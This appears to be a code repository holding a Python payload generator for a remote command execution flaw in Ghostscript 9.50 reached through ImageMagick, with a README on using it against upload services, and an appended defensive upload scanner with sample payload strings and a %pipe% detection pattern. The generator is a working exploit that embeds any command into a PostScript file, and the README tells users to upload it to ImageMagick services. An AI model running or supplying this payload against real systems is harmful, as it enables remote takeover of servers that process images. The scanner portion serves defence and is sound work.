├── IM-RCE-via-GhostScript-9.5.py
└── README.md

/IM-RCE-via-GhostScript-9.5.py:
--------------------------------------------------------------------------------
```python
#from ducnt import <3
import sys


def generate_payload(_cmd, _filename):
    """Write a PostScript file whose %pipe% device string runs _cmd."""
    _payload = """
copies (%pipe%/tmp/;{}) (r) file
showpage
0 quit
""".format(_cmd)
    # Context manager so the file is flushed and closed before we return.
    with open(_filename, "w+") as f:
        f.write(_payload)
    return True


def main():
    if len(sys.argv) < 3:
        print("Usage: python IM-RCE-via-GhostScript-9.5.py ")
        sys.exit(1)
    _cmd = sys.argv[1]
    _filename = sys.argv[2]
    generate_payload(_cmd, _filename)
    print("Generating malicious payload successfully, upload it to Imagemagick service or trigger local via bash cmd: $ convert ")


if __name__ == "__main__":
    main()
```
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# RCE-0-day-for-GhostScript-9.50

### PoC for RCE 0-day for GhostScript 9.50 - Payload generator
### This Python PoC generates the payload for a 0-day in GhostScript 9.50. The 0-day affects ImageMagick with the default settings from the Ubuntu repository (tested with the default settings of ImageMagick on Ubuntu 20.04).

### This project is created only for educational purposes and cannot be used for law violation or personal gain.
### The author of this project is not responsible for any possible harm caused by the materials of this project.

### Original finding and awesome research from Emil Lerner: https://twitter.com/emil_lerner/status/1430502815181463559

### Usage: `python IM-RCE-via-GhostScript-9.5.py `

## Demo


## Note for php-imagemagick: sometimes you must find the correct `fd/`. The easiest way to do this is fuzzing, with something like this (tested with Ubuntu 20.04 and the default php-imagemagick install).
--------------------------------------------------------------------------------
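The README states that this payload reaches Ghostscript through ImageMagick's default configuration. As an added defensive example, not part of this repository, the following pre-upload scanner flags the `%pipe%` device token that the generator above writes, and separately flags PostScript/PDF bodies hidden behind image extensions (ImageMagick picks the coder by content, not file name). The sample inputs, file names and thresholds are constructed for the example.

```python
import re

# Magic prefixes that make ImageMagick route a blob to its Ghostscript
# delegate by content, whatever extension the uploader chose.
GS_MAGIC = (b"%!PS", b"%PDF-", b"\xc5\xd0\xd3\xc6")  # PS/EPS text, PDF, DOS-EPS binary

# The Ghostscript device that opens a process instead of a file; it is the
# token this repo's payload generator writes into the PostScript.
PIPE_DEVICE = re.compile(rb"%pipe%", re.IGNORECASE)


def is_ghostscript_routed(data: bytes) -> bool:
    """True if the blob carries a PS/EPS/PDF magic header."""
    head = data.lstrip()[:16]
    return any(head.startswith(m) for m in GS_MAGIC)


def scan_upload(data: bytes, declared_ext: str) -> dict:
    """Classify an upload before it is handed to `convert`.

    'reject' is True when the blob must not reach ImageMagick. The %pipe%
    match is a tripwire only: PostScript can assemble the device name at run
    time, so the durable mitigation is the coder policy (see note below).
    """
    gs_routed = is_ghostscript_routed(data)
    pipe = PIPE_DEVICE.search(data) is not None
    # A PS/PDF body behind an image extension is the classic bypass, because
    # ImageMagick sniffs by content rather than by file name.
    mismatch = gs_routed and declared_ext.lower() in {"png", "jpg", "jpeg", "gif"}
    return {
        "gs_routed": gs_routed,
        "pipe_device": pipe,
        "ext_mismatch": mismatch,
        "reject": pipe or gs_routed,
    }


# Constructed samples (not taken from any real upload): the headerless shape
# this repo's generator produces (harmless `id`), a PS body renamed to .png,
# and a genuine PNG header.
SAMPLES = {
    "payload.ps": (b"copies (%pipe%/tmp/;id) (r) file\nshowpage\n0 quit\n", "ps"),
    "renamed.png": (b"%!PS-Adobe-3.0\n/OutputFile (%PIPE%id) def\n", "png"),
    "real.png": (b"\x89PNG\r\n\x1a\n" + b"\x00" * 8, "png"),
}


def scan_all(samples=SAMPLES) -> dict:
    return {name: scan_upload(data, ext) for name, (data, ext) in samples.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(name, result)
```

The durable fix is ImageMagick's `policy.xml` granting `rights="none"` to the PS, PS2, PS3, EPS, PDF and XPS coders (plus a patched Ghostscript); the scanner is only a tripwire in front of that.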